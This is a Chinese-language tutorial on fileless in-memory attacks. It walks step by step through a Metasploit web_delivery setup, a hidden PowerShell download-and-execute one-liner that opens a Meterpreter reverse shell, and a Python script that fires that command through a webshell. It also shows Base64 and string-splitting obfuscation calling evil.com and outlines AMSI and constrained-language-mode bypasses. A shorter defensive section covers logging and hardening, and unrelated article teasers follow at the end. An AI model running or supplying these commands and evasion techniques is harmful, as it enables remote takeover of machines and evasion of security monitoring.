无文件攻击实战教程:从入门到精通的内存执行指南

news2026/3/21 14:50:19
前言1. 技术背景攻防体系中的“隐形战机”在现代网络攻防体系中对抗的本质是信息的获取与反获取、控制与反控制。传统的恶意软件依赖于在磁盘上写入文件如.exe,.dll这为基于签名的杀毒软件AV和终端检测与响应EDR系统提供了明确的检测目标。然而**无文件攻击Fileless Attack**彻底改变了这一游戏规则。它将恶意代码直接加载到内存中执行避免在磁盘上留下任何痕迹如同战场上的“隐形战机”极大地增加了检测和溯源的难度已成为高级持续性威胁APT和红队渗透测试中的主流攻击手法。2. 学习价值掌握“降维打击”的钥匙掌握无文件攻击技术意味着你将能够绕过传统防御学会如何规避依赖文件扫描的杀毒软件和部分EDR规则提升渗透测试的成功率。理解高级威胁深入洞察现代恶意软件如Cobalt Strike、Metasploit的核心工作原理从根本上理解它们的威胁所在。提升防御能力知己知彼百战不殆。只有深刻理解了无文件攻击的原理和技巧才能构建真正有效的纵深防御体系精准识别和拦截此类高级威胁。3. 使用场景真实世界的应用无文件攻击技术在以下场景中被广泛应用红队演练与渗透测试在获取初始立足点后用于横向移动、权限提升和长期驻留以模拟最真实的APT攻击路径。恶意软件投递通过钓鱼邮件中的宏、浏览器漏洞或恶意脚本直接在受害者内存中执行下载器或勒索软件核心模块。系统管理与自动化系统管理员也常使用类似技术如PowerShell远程执行进行合法的、高效的批量管理和部署工作。这体现了技术的两面性。一、无文件攻击是什么1. 精确定义无文件攻击是一种高级攻击技术它指的是恶意代码不以传统文件形式存在于目标系统的硬盘上而是直接在计算机的**内存RAM**中加载并执行。攻击载荷Payload通常通过合法的、受信任的系统工具如PowerShell、WMI、.NET框架注入和运行从而实现“落地无痕”。2. 通俗类比想象一下传统的病毒像一个**“实体包裹”**。小偷攻击者必须先把这个包裹恶意文件送到你家电脑硬盘然后找机会打开它。保安杀毒软件可以通过检查所有进出的包裹来发现并拦截它。而无文件攻击则像一个**“电话指令”**。小偷直接打电话给你家里的管家一个合法的系统程序如PowerShell用一套复杂的指令让他去执行一系列看似正常但实际上是恶意的操作。因为整个过程没有实体包裹进入保安很难发现异常直到小偷的目的已经达成。3. 实际用途隐蔽性核心优势。由于不产生文件可以轻松绕过基于文件特征码和签名的传统杀毒软件。利用合法进程攻击寄生于白名单进程Living-off-the-Land Binaries, LOLBins使得基于进程行为的检测更加困难因为恶意行为看起来像是合法程序在正常工作。权限维持可以通过在注册表、WMI订阅或计划任务中存储小型脚本而非完整程序来实现持久化同样难以被发现。4. 技术本质说明无文件攻击的本质是滥用操作系统提供的合法功能和接口在内存中完成恶意代码的完整生命周期投递、注入、执行。其核心在于利用系统进程申请一块内存空间将shellcode一段用于获取目标系统shell的机器码或完整的恶意模块如DLL写入这块内存然后改变进程的执行流程使其跳转到这块内存地址开始执行。以下是典型的无文件攻击执行流程的Mermaid图清晰地展示了从远程服务器获取载荷到在目标内存中执行的全过程。Windows API (Kernel32.dll)合法进程 (e.g., powershell.exe)受害者主机攻击者服务器Windows API (Kernel32.dll)合法进程 (e.g., powershell.exe)受害者主机攻击者服务器攻击初始阶段内存注入与执行阶段攻击效果达成1. 执行初始脚本 (e.g., IEX(New-Object Net.WebClient).DownloadString(http://...))2. 返回第二阶段载荷 (Shellcode)3. 启动合法进程 (powershell.exe)4. 调用 VirtualAlloc 申请可执行内存5. 返回内存区域地址6. 将Shellcode复制到申请的内存中7. 调用 CreateThread 创建新线程8. 新线程从Shellcode地址开始执行9. Shellcode执行建立C2回连这张图清晰地展示了无文件攻击原理利用一个初始的下载命令获取真正的恶意代码Shellcode然后在内存中申请空间、写入代码并最终通过创建一个新线程来执行它全程没有文件落地。二、环境准备为了安全、可控地复现无文件攻击我们将使用业界标准的渗透测试工具Metasploit Framework和一台Windows 10虚拟机作为靶机。攻击机 (Kali Linux)操作系统: Kali Linux (2023.4或更新版本)核心工具: Metasploit Framework (v6.3或更新版本)下载方式: Kali Linux自带可通过sudo apt update sudo apt install metasploit-framework安装或更新。核心配置:启动数据库sudo systemctl start postgresql初始化Metasploit数据库sudo msfdb init启动Metasploit控制台msfconsole靶机 (Windows 10)操作系统: Windows 10 Pro (x64)配置:关闭Windows Defender实时保护为了顺利完成实验观察最纯粹的攻击流程。在真实环境中我们的目标是绕过它。获取IP地址打开命令提示符输入ipconfig记下IPv4地址。网络: 确保攻击机和靶机在同一局域网内可以相互ping通。可运行环境命令在Kali上启动Metasploit服务# 启动数据库服务sudosystemctl start postgresql# 启动Metasploit控制台msfconsole在Windows 10靶机上确保网络连接正常并暂时关闭安全软件。三、核心实战PowerShell无文件上线Metasploit本节将演示一个最经典的无文件攻击实战案例利用PowerShell从远程服务器下载并执行Metasploit的Meterpreter载荷从而获取靶机的控制权。⚠️ 警告以下所有操作仅限在获得明确授权的测试环境中使用。未经授权的测试是违法行为。步骤一在攻击机(Kali)上生成并托管载荷目的生成一个基于PowerShell的无文件攻击载荷并设置一个监听器等待靶机连接。打开msfconsole。使用web_delivery模块这是一个专门用于生成无文件攻击命令的模块。# 1. 选择web_delivery模块use exploit/multi/script/web_delivery# 2. 设置载荷为Windows Meterpreter反向TCP连接# 这是我们的核心Shellcode它将在靶机内存中运行set payload windows/x64/meterpreter/reverse_tcp# 3. 设置监听IP (LHOST) 为你的Kali攻击机IP# 使用 ip a 命令查看你的IPsetLHOST192.168.1.100# 4. 设置目标平台为PowerShell (PSH)# 这会让模块生成一段PowerShell命令set targetPSH# 5. 运行模块启动Web服务器和监听器exploit步骤二查看生成的攻击命令目的获取需要在靶机上执行的“电话指令”。exploit命令执行后Metasploit会输出如下结果[*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.1.100:4444 [*] Using URL: http://192.168.1.100:8080/aBcDeFg [*] Local IP: http://192.168.1.100:8080/aBcDeFg [*] Server started. [*] Run the following command on the target machine: powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(http://192.168.1.100:8080/aBcDeFg)结果分析powershell.exe -nop -w hidden -c ...: 这是我们最终需要在靶机上执行的命令。-nop(NoProfile): 不加载PowerShell配置文件避免干扰。-w hidden(WindowStyle Hidden): 隐藏执行窗口增加隐蔽性。-c(Command): 执行后面的命令字符串。IEX(...):IEX是Invoke-Expression的别名它的作用是执行一个字符串形式的命令。(New-Object Net.WebClient).DownloadString(...): 这部分代码创建了一个Web客户端对象并从指定的URL下载内容。下载的内容是一个字符串。核心机制这条命令的本质是让PowerShell从攻击者的Web服务器下载另一段更复杂的PowerShell脚本然后IEX会直接在内存中执行这个下载的脚本而这个脚本的核心功能就是加载Meterpreter Shellcode。步骤三在靶机(Windows 10)上执行命令目的模拟受害者点击恶意链接或运行恶意文档触发攻击。在Windows 10靶机上按下Win R输入powershell并回车打开PowerShell窗口。将上一步Metasploit生成的完整命令复制并粘贴到PowerShell窗口中然后按回车。powershell.exe-nop-w hidden-cIEX(New-Object Net.WebClient).DownloadString(http://192.168.1.100:8080/aBcDeFg)你会发现命令执行后靶机上没有任何文件生成也没有弹出任何新的窗口。步骤四在攻击机(Kali)上验证成果目的确认是否成功获取靶机控制权。回到Kali的msfconsole你会看到如下输出[*] Sending stage (200774 bytes) to 192.168.1.200 [*] Meterpreter session 1 opened (192.168.1.100:4444 - 192.168.1.200:49755) at 2026-03-21 01:13:22 0000 meterpreter 结果分析Meterpreter session 1 opened: 这句话表明我们已经成功地在靶机内存中运行了Meterpreter并建立了一个加密的反向连接。meterpreter : 你现在处于Meterpreter的控制台可以对靶机执行各种操作例如sysinfo: 查看系统信息。screenshot: 截取屏幕。shell: 获取一个标准的Windows命令行Shell。至此一个完整的、端到端的无文件攻击实战演示就完成了。自动化脚本示例在真实的渗透测试中我们通常会将这类命令封装成自动化脚本。以下是一个简单的Python脚本用于在获取某个WebShell后自动执行PowerShell无文件攻击来提权。# -*- coding: utf-8 -*-importrequestsimportargparse# 警告本脚本仅用于授权的渗透测试和安全研究严禁用于非法目的。# 使用此脚本造成的任何后果由使用者自行承担。defexecute_fileless_payload(target_url,msf_payload_url): 通过一个假定的WebShell接口执行无文件攻击载荷。 :param target_url: 存在命令执行漏洞或WebShell的URL。 :param msf_payload_url: Metasploit web_delivery模块生成的URL。 print(f[*] 目标URL:{target_url})print(f[*] Metasploit载荷URL:{msf_payload_url})# 构建要在目标上执行的PowerShell命令# 使用-e参数可以对命令进行Base64编码进一步绕过简单的日志检测# powershell -nop -w hidden -e base64_encoded_commandps_commandfIEX(New-Object Net.WebClient).DownloadString({msf_payload_url})# 这里我们模拟一个WebShell它接受一个名为cmd的参数来执行命令# 在真实场景中这部分需要根据具体WebShell的交互方式来修改payload{cmd:fpowershell.exe -nop -w hidden -c \{ps_command}\}print(f[*] 正在构造并发送payload:{payload[cmd]})try:responserequests.post(target_url,datapayload,timeout15)response.raise_for_status()# 如果HTTP请求返回了错误状态码则抛出异常print([] Payload已成功发送。请检查您的Metasploit监听器。)print(f[*] 服务器响应 (部分): \n{response.text[:200]}...)exceptrequests.exceptions.RequestExceptionase:print(f[!] 发送Payload失败:{e})print([!] 请检查目标URL是否可达、WebShell是否正常工作以及网络连接。)if__name____main__:parserargparse.ArgumentParser(description自动化无文件攻击执行脚本。)parser.add_argument(-t,--target,requiredTrue,help目标WebShell的URL (例如: http://example.com/shell.php))parser.add_argument(-p,--payload,requiredTrue,helpMetasploit web_delivery模块生成的完整URL)argsparser.parse_args()execute_fileless_payload(args.target,args.payload)如何使用这个脚本保存为run_fileless.py。在Kali上按照步骤一设置好web_delivery。假设你在http://192.168.1.200/shell.php有一个WebShell运行脚本python3 run_fileless.py-thttp://192.168.1.200/shell.php-phttp://192.168.1.100:8080/aBcDeFg四、进阶技巧1. 常见错误与规避错误命令被引号或特殊字符截断。原因在复杂的执行链中如通过cmd.exe调用powershell.exe引号和特殊字符可能被错误地解析。解决方案使用PowerShell的-EncodedCommand参数。该参数接受一个Base64编码的字符串可以有效避免特殊字符问题。# 原始命令$CommandIEX(New-Object Net.WebClient).DownloadString(http://192.168.1.100/payload)# 转换为UTF-16LE并进行Base64编码$Bytes[System.Text.Encoding]::Unicode.GetBytes($Command)$EncodedCommand[Convert]::ToBase64String($Bytes)# 执行powershell.exe-e$EncodedCommand2. 性能 / 成功率优化优化点减少网络特征。问题Net.WebClient和DownloadString的组合是众所周知的恶意行为特征很容易被EDR和网络流量分析工具检测。优化方案使用更底层的.NET类或者通过COM对象如Msxml2.XMLHTTP来发起HTTP请求甚至使用DNS隧道来传输载荷这些都属于更高级的无文件攻击使用方法。优化点内存注入目标选择。问题直接注入powershell.exe自身进程行为异常如建立网络连接容易被监控。优化方案将Shellcode注入到其他看似无害的、具有网络功能的合法进程中如explorer.exe、svchost.exe等。这需要更复杂的进程注入技术如CreateRemoteThread。3. 实战经验总结环境感知在执行任何操作前先利用PowerShell进行信息收集Get-ComputerInfo,Get-Process,Get-NetIPAddress了解目标环境特别是检查是否有EDR或高级杀软进程在运行。分阶段执行不要一步到位。第一阶段的脚本应该尽可能小、尽可能“无害”只负责下载并执行第二阶段的脚本。第二阶段再进行内存注入。这种分层可以绕过一些静态分析。混淆与加密永远不要使用明文的PowerShell脚本。使用Invoke-Obfuscation等工具对脚本进行多层混淆和加密可以大大增加被逆向分析的难度。4. 对抗 / 绕过思路AMSI绕过AMSIAntimalware Scan Interface是微软推出的一个接口允许杀毒软件扫描脚本内容。绕过AMSI是现代PowerShell攻击的必修课。常见的绕过方法包括在脚本执行前通过反射在内存中修补AmsiScanBuffer函数使其直接返回“干净”的结果。利用AMSI的初始化失败漏洞强制其失效。网络上有许多公开的单行AMSI绕过代码但它们很快会被标记需要不断寻找或创造新的变种。约束语言模式Constrained Language Mode绕过在某些加固的环境中PowerShell可能运行在约束语言模式下许多危险的命令和.NET类型被禁用。绕过方法通常是寻找一个未被该模式限制的“后门”例如利用某些特定的.NET类或COM对象来执行代码或者降级PowerShell版本。五、注意事项与防御1. 错误写法 vs 正确写法从攻击者角度错误写法:powershell IEX (New-Object Net.WebClient).DownloadString(http://evil.com/payload.ps1)风险: 特征过于明显IEX,DownloadString几乎等同于恶意行为会被任何现代防御产品拦截。日志中会留下清晰的下载地址。正确写法 (更隐蔽):# 1. 将载荷分块编码隐藏在看似无害的脚本中$aIEX (New-Object Net.Web;$bClient).Download;$cString(http://evil.com/p)# 2. 通过字符串拼接和混淆函数名来执行$cmd$a$b$cInvoke-Command-ScriptBlock([scriptblock]::create($cmd))优点: 避免了完整的恶意特征字符串出现在同一行增加了静态分析的难度。2. 风险提示无文件攻击技术威力巨大极易被滥用。务必遵守法律法规和道德准则。内存中的操作并非完全无法追踪。先进的EDR产品可以通过监控API调用链如VirtualAlloc-WriteProcessMemory-CreateRemoteThread、PowerShell脚本块日志和ETWEvent Tracing for Windows事件来检测可疑的内存操作。3. 开发侧安全代码范式输入验证对于任何接受用户输入的应用程序尤其是Web应用严格验证和过滤所有输入防止命令注入漏洞这是无文件攻击的常见入口点。最小权限原则运行应用程序和服务的账户应使用最小权限避免给予不必要的系统访问权限。例如一个Web服务器账户不应该有执行PowerShell脚本的权限。4. 运维侧加固方案PowerShell加固升级到最新版本确保所有系统都使用最新版的PowerShell以便获得所有安全功能。启用脚本块日志和模块日志通过组策略开启PowerShell日志记录将所有执行的脚本块即使是混淆的和模块加载事件记录到Windows事件日志中。这是检测无文件攻击最关键的一步。部署约束语言模式对普通用户和不需要高级功能的服务账户通过AppLocker或Device Guard策略强制PowerShell在约束语言模式下运行。应用程序白名单使用AppLocker等工具只允许经过批准的应用程序运行限制攻击者利用LOLBins的能力。攻击面减小禁用或卸载非必需的系统功能和服务如旧版本的PowerShell、非必要的远程管理工具等。5. 日志检测线索事件ID 4104 (PowerShell脚本块日志)在Windows PowerShell日志中查找此事件ID。它会记录下执行的每一段脚本内容即使经过多层编码和混淆最终解密执行的代码也会被记录下来。这是发现无文件攻击的“金矿”。可疑的网络连接监控非浏览器进程如powershell.exe,cscript.exe,rundll32.exe发起的可疑出站网络连接特别是连接到非常见IP地址或域名的。异常的父子进程关系例如一个Office文档进程winword.exe创建了一个powershell.exe子进程这是一个非常可疑的信号。内存API调用序列EDR产品会监控VirtualAlloc-WriteProcessMemory-CreateRemoteThread/QueueUserAPC这一系列高风险API调用组合这是进程注入的典型特征。总结核心知识无文件攻击通过滥用系统自带的合法工具如PowerShell将恶意代码直接加载到内存中执行从而绕过传统的基于文件的防御机制。使用场景广泛应用于高级渗透测试、APT攻击和恶意软件投递中以实现隐蔽的命令执行、权限提升和持久化。防御要点防御的核心在于行为检测而非静态签名。必须启用并监控PowerShell脚本块日志事件ID 4104限制PowerShell权限约束语言模式并利用EDR监控可疑的进程行为和内存API调用。知识体系连接无文件攻击是“利用合法程序LOLBins”思想的延伸与进程注入、反射加载、AMSI绕过、代码混淆等技术紧密相连是现代攻击链中承上启下的关键一环。进阶方向深入研究.NET内部机制、COM对象、WMI事件订阅、以及更底层的Windows API可以解锁更多、更隐蔽的无文件攻击原理与技巧例如C#的反射加载、WMI持久化等。自检清单是否说明技术价值是否给出学习目标是否有 Mermaid 核心机制图是否有可运行代码是否有防御示例是否连接知识体系是否避免模糊术语

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2433753.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SpringBoot-17-MyBatis动态SQL标签之常用标签

文章目录 1 代码1.1 实体User.java1.2 接口UserMapper.java1.3 映射UserMapper.xml1.3.1 标签if1.3.2 标签if和where1.3.3 标签choose和when和otherwise1.4 UserController.java2 常用动态SQL标签2.1 标签set2.1.1 UserMapper.java2.1.2 UserMapper.xml2.1.3 UserController.ja…

wordpress后台更新后 前端没变化的解决方法

使用siteground主机的wordpress网站,会出现更新了网站内容和修改了php模板文件、js文件、css文件、图片文件后,网站没有变化的情况。 不熟悉siteground主机的新手,遇到这个问题,就很抓狂,明明是哪都没操作错误&#x…

网络编程(Modbus进阶)

思维导图 Modbus RTU(先学一点理论) 概念 Modbus RTU 是工业自动化领域 最广泛应用的串行通信协议,由 Modicon 公司(现施耐德电气)于 1979 年推出。它以 高效率、强健性、易实现的特点成为工业控制系统的通信标准。 包…

UE5 学习系列(二)用户操作界面及介绍

这篇博客是 UE5 学习系列博客的第二篇,在第一篇的基础上展开这篇内容。博客参考的 B 站视频资料和第一篇的链接如下: 【Note】:如果你已经完成安装等操作,可以只执行第一篇博客中 2. 新建一个空白游戏项目 章节操作,重…

IDEA运行Tomcat出现乱码问题解决汇总

最近正值期末周,有很多同学在写期末Java web作业时,运行tomcat出现乱码问题,经过多次解决与研究,我做了如下整理: 原因: IDEA本身编码与tomcat的编码与Windows编码不同导致,Windows 系统控制台…

利用最小二乘法找圆心和半径

#include <iostream> #include <vector> #include <cmath> #include <Eigen/Dense> // 需安装Eigen库用于矩阵运算 // 定义点结构 struct Point { double x, y; Point(double x_, double y_) : x(x_), y(y_) {} }; // 最小二乘法求圆心和半径 …

使用docker在3台服务器上搭建基于redis 6.x的一主两从三台均是哨兵模式

一、环境及版本说明 如果服务器已经安装了docker,则忽略此步骤,如果没有安装,则可以按照一下方式安装: 1. 在线安装(有互联网环境): 请看我这篇文章 传送阵>> 点我查看 2. 离线安装(内网环境):请看我这篇文章 传送阵>> 点我查看 说明&#xff1a;假设每台服务器已…

XML Group端口详解

在XML数据映射过程中&#xff0c;经常需要对数据进行分组聚合操作。例如&#xff0c;当处理包含多个物料明细的XML文件时&#xff0c;可能需要将相同物料号的明细归为一组&#xff0c;或对相同物料号的数量进行求和计算。传统实现方式通常需要编写脚本代码&#xff0c;增加了开…

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器的上位机配置操作说明

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器专为工业环境精心打造&#xff0c;完美适配AGV和无人叉车。同时&#xff0c;集成以太网与语音合成技术&#xff0c;为各类高级系统&#xff08;如MES、调度系统、库位管理、立库等&#xff09;提供高效便捷的语音交互体验。 L…

(LeetCode 每日一题) 3442. 奇偶频次间的最大差值 I (哈希、字符串)

题目&#xff1a;3442. 奇偶频次间的最大差值 I 思路 &#xff1a;哈希&#xff0c;时间复杂度0(n)。 用哈希表来记录每个字符串中字符的分布情况&#xff0c;哈希表这里用数组即可实现。 C版本&#xff1a; class Solution { public:int maxDifference(string s) {int a[26]…

【大模型RAG】拍照搜题技术架构速览:三层管道、两级检索、兜底大模型

摘要 拍照搜题系统采用“三层管道&#xff08;多模态 OCR → 语义检索 → 答案渲染&#xff09;、两级检索&#xff08;倒排 BM25 向量 HNSW&#xff09;并以大语言模型兜底”的整体框架&#xff1a; 多模态 OCR 层 将题目图片经过超分、去噪、倾斜校正后&#xff0c;分别用…

【Axure高保真原型】引导弹窗

今天和大家中分享引导弹窗的原型模板&#xff0c;载入页面后&#xff0c;会显示引导弹窗&#xff0c;适用于引导用户使用页面&#xff0c;点击完成后&#xff0c;会显示下一个引导弹窗&#xff0c;直至最后一个引导弹窗完成后进入首页。具体效果可以点击下方视频观看或打开下方…

接口测试中缓存处理策略

在接口测试中&#xff0c;缓存处理策略是一个关键环节&#xff0c;直接影响测试结果的准确性和可靠性。合理的缓存处理策略能够确保测试环境的一致性&#xff0c;避免因缓存数据导致的测试偏差。以下是接口测试中常见的缓存处理策略及其详细说明&#xff1a; 一、缓存处理的核…

龙虎榜——20250610

上证指数放量收阴线&#xff0c;个股多数下跌&#xff0c;盘中受消息影响大幅波动。 深证指数放量收阴线形成顶分型&#xff0c;指数短线有调整的需求&#xff0c;大概需要一两天。 2025年6月10日龙虎榜行业方向分析 1. 金融科技 代表标的&#xff1a;御银股份、雄帝科技 驱动…

观成科技:隐蔽隧道工具Ligolo-ng加密流量分析

1.工具介绍 Ligolo-ng是一款由go编写的高效隧道工具&#xff0c;该工具基于TUN接口实现其功能&#xff0c;利用反向TCP/TLS连接建立一条隐蔽的通信信道&#xff0c;支持使用Let’s Encrypt自动生成证书。Ligolo-ng的通信隐蔽性体现在其支持多种连接方式&#xff0c;适应复杂网…

铭豹扩展坞 USB转网口 突然无法识别解决方法

当 USB 转网口扩展坞在一台笔记本上无法识别,但在其他电脑上正常工作时,问题通常出在笔记本自身或其与扩展坞的兼容性上。以下是系统化的定位思路和排查步骤,帮助你快速找到故障原因: 背景: 一个M-pard(铭豹)扩展坞的网卡突然无法识别了,扩展出来的三个USB接口正常。…

未来机器人的大脑:如何用神经网络模拟器实现更智能的决策?

编辑&#xff1a;陈萍萍的公主一点人工一点智能 未来机器人的大脑&#xff1a;如何用神经网络模拟器实现更智能的决策&#xff1f;RWM通过双自回归机制有效解决了复合误差、部分可观测性和随机动力学等关键挑战&#xff0c;在不依赖领域特定归纳偏见的条件下实现了卓越的预测准…

Linux应用开发之网络套接字编程(实例篇)

服务端与客户端单连接 服务端代码 #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <arpa/inet.h> #include <pthread.h> …

华为云AI开发平台ModelArts

华为云ModelArts&#xff1a;重塑AI开发流程的“智能引擎”与“创新加速器”&#xff01; 在人工智能浪潮席卷全球的2025年&#xff0c;企业拥抱AI的意愿空前高涨&#xff0c;但技术门槛高、流程复杂、资源投入巨大的现实&#xff0c;却让许多创新构想止步于实验室。数据科学家…

深度学习在微纳光子学中的应用

深度学习在微纳光子学中的主要应用方向 深度学习与微纳光子学的结合主要集中在以下几个方向&#xff1a; 逆向设计 通过神经网络快速预测微纳结构的光学响应&#xff0c;替代传统耗时的数值模拟方法。例如设计超表面、光子晶体等结构。 特征提取与优化 从复杂的光学数据中自…